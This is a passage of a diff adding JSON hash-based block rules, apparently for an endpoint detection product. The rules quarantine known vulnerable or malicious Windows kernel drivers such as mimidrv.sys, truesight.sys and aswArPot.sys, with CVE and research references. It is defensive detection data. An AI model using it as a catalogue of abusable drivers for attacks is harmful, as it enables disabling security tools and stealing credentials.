+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f282c62-f551-556b-8839-18aeb7b3b1d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461324Z",
+ "creation_date": "2026-03-23T11:45:30.461328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461336Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4ee803eefdb4eaeedb3024c3516f1f9a202c77f4870d6b74356bbde32b3b560",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f3121cf-9ac1-579d-a37e-21ab691b5c07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142707Z",
+ "creation_date": "2026-03-23T11:45:32.142709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf9859b7126c8f1546911651d0f4a506c8802451807b695854429f8b79688a37",
+ "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f3ca033-702f-5d05-9889-39b20b8dcb24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621461Z",
+ "creation_date": "2026-03-23T11:45:29.621463Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c344e92a6d06155a217a9af7b4b35e6653665eec6569292e7b2e70f3a3027646",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f409154-88a5-5c90-92fe-87d19d219bca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466908Z",
+ "creation_date": "2026-03-23T11:45:30.466911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466920Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a84ad211fc549d0f118b3211cb11fd3ab2ced86de9cd20173d03e1a47834133",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f422f0d-8729-5ae4-80d9-814c54e5d56e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810716Z",
+ "creation_date": "2026-03-23T11:45:31.810718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810723Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fda127b1df8d657e35b73f61384dfeeac17bf4d20e9e733488420a14b3a2578c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f4953e8-71a4-5c34-a393-a46444428e8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606611Z",
+ "creation_date": "2026-03-23T11:45:29.606613Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6dd992ad181d9a8ba8bc02542a5379375857460d8f2818ff6fc32f726aa431af",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f509653-bf7d-5150-8788-578fe22d3c5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815689Z",
+ "creation_date": "2026-03-23T11:45:30.815691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66a9052d6b1d35147f581249f6b524d8cab0b7c6ff80f621a4481f43db462540",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f51834f-e8b6-5c64-b042-54a978fb8581",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810894Z",
+ "creation_date": "2026-03-23T11:45:31.810896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810901Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c872de9c4d9b5d7f18a8789939951d691882da450b11793f59c9f4ef21fb621e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f5bb38f-d477-5f16-a333-fcdbac5f80cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621774Z",
+ "creation_date": "2026-03-23T11:45:29.621776Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621782Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5aa7a47c7abaf13453b8ab309ef16bdd80ceaf7407e67fa27932d4591f025d67",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f65c1a6-841e-557a-98d2-3ad57a62dfe0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971488Z",
+ "creation_date": "2026-03-23T11:45:29.971490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a95a70f68144980f2d684e96c79bdc93ebca1587f46afae6962478631e85d0c",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f6a52e0-c0be-527f-b9a2-764df05b0e48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969785Z",
+ "creation_date": "2026-03-23T11:45:29.969787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969792Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59e004cd839611cbc5f7c061827587dbb120d7aab8d0e44191c0c01aeed9e168",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0f85c1a6-8c8f-544a-b4d7-5db7e09943c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468318Z",
+ "creation_date": "2026-03-23T11:45:30.468322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67d4654d7e78e4d0761d8e200096935791d59acb2bf98106dafff449647c840f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fb68b29-3473-53ee-9689-96daac6b1333",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481809Z",
+ "creation_date": "2026-03-23T11:45:31.481812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481823Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a56b64d3822154749911a8189edc435f70ebedddd1da76878e7a1ce3b0a2bd15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fb82f82-7cae-50ae-ab33-f0be416f9165",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489578Z",
+ "creation_date": "2026-03-23T11:45:31.489581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489588Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f47e8b63cbe05a0a83806501d7eecb6339c5a718f80f8f1866fa164595ca185",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fb943dc-aacd-527c-ba74-255d63204b22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610600Z",
+ "creation_date": "2026-03-23T11:45:29.610602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d57e416ea4bb855b78a2ff3c80de1dfbb5dc5ee9bfbdddb23e46bd8619287e2",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fbe90a8-9c10-5814-8b58-32945e5e707c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615417Z",
+ "creation_date": "2026-03-23T11:45:29.615419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e92baa37cd8b665ca0851f8442766aaf3b96fa61ea137d5972d5eb059389a05",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fc1ee8a-333d-5770-b7de-619bddb8fb7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827928Z",
+ "creation_date": "2026-03-23T11:45:30.827930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df5548418a899fe0b375f35e196637cb873acb374a300c865f183af388ca40c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fc556da-9f78-5d44-993e-67fe027d4fbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618237Z",
+ "creation_date": "2026-03-23T11:45:29.618239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9368e51ec98e2ad20893a5fc21e6a8b20c5bee158d5c49ca58649cff84db9d68",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fc90c00-c363-5593-ace6-7eeee1ee032e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972738Z",
+ "creation_date": "2026-03-23T11:45:29.972740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f78e06f649bc0d88770c5465d7792abeb27631ec0ce9a0fa68698b94ebf2cf49",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fcb3917-67ca-54b5-af45-e3e3c5d6457e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476436Z",
+ "creation_date": "2026-03-23T11:45:31.476440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476449Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "987249b8aad583f4de69b2371182db2d379381d175ea50b1ea0500de0394d57c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fd2871d-6f8b-5ac3-a632-c2c583adfd98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973148Z",
+ "creation_date": "2026-03-23T11:45:29.973150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86236392bb2cc77100bd83d34a30e3fb60aa727d0b11c147a838d9a205bae80e",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fd85c56-ccfe-5ebd-bbdd-e4c1623b4f29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466043Z",
+ "creation_date": "2026-03-23T11:45:30.466046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f7bfa10075bf5c193345866333d415509433dbfe5a7d45664b88d72216ff7c3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fdc589e-7f5c-5c77-8ad3-7b555320b40a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
